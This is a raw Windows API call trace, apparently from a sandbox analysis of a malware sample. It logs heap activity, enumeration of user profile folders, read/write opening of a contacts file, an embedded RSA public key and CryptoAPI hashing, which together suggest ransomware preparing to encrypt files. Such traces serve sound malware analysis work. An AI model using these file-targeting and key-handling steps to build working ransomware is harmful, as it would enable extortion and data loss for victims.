[0184.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.656] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Application Data\\") returned="Application Data\\" [0184.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0184.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0184.657] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0184.657] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.657] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.657] PathFindFileNameW (pszPath="") returned="" [0184.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.657] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Application Data\\*" (normalized: "c:\\users\\keecfmwgj\\application data\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b49aff0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b49aff0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0184.659] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0184.659] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.660] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\") returned="Contacts\\" [0184.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0184.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0184.660] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a18 [0184.660] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.660] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.660] PathFindFileNameW (pszPath="") returned="" [0184.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.660] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\*" (normalized: "c:\\users\\keecfmwgj\\contacts\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.660] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.660] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0184.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0184.661] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact") returned=".contact" [0184.661] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.662] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=68382) returned 1 [0184.662] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0184.666] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.666] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0184.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0184.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0184.680] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.680] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0184.681] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0184.681] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.681] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.692] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0184.695] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0184.695] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.695] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0184.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26788 [0184.695] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26788, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26788, pdwDataLen=0x2f9fa54) returned 1 [0184.723] GetLastError () returned 0x0 [0184.735] SetLastError (dwErrCode=0x0) [0184.758] GetLastError () returned 0x0 [0184.758] SetLastError (dwErrCode=0x0) [0184.758] GetLastError () returned 0x0 [0184.758] SetLastError (dwErrCode=0x0) [0184.791] GetLastError () returned 0x0 [0184.791] SetLastError (dwErrCode=0x0) [0184.791] GetLastError () returned 0x0 [0184.791] SetLastError (dwErrCode=0x0) [0184.791] GetLastError () returned 0x0 [0184.791] SetLastError (dwErrCode=0x0) [0184.791] GetLastError () returned 0x0 [0184.791] SetLastError (dwErrCode=0x0) [0184.791] GetLastError () returned 0x0 [0184.791] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a18 [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.792] GetLastError () returned 0x0 [0184.792] SetLastError (dwErrCode=0x0) [0184.793] GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] 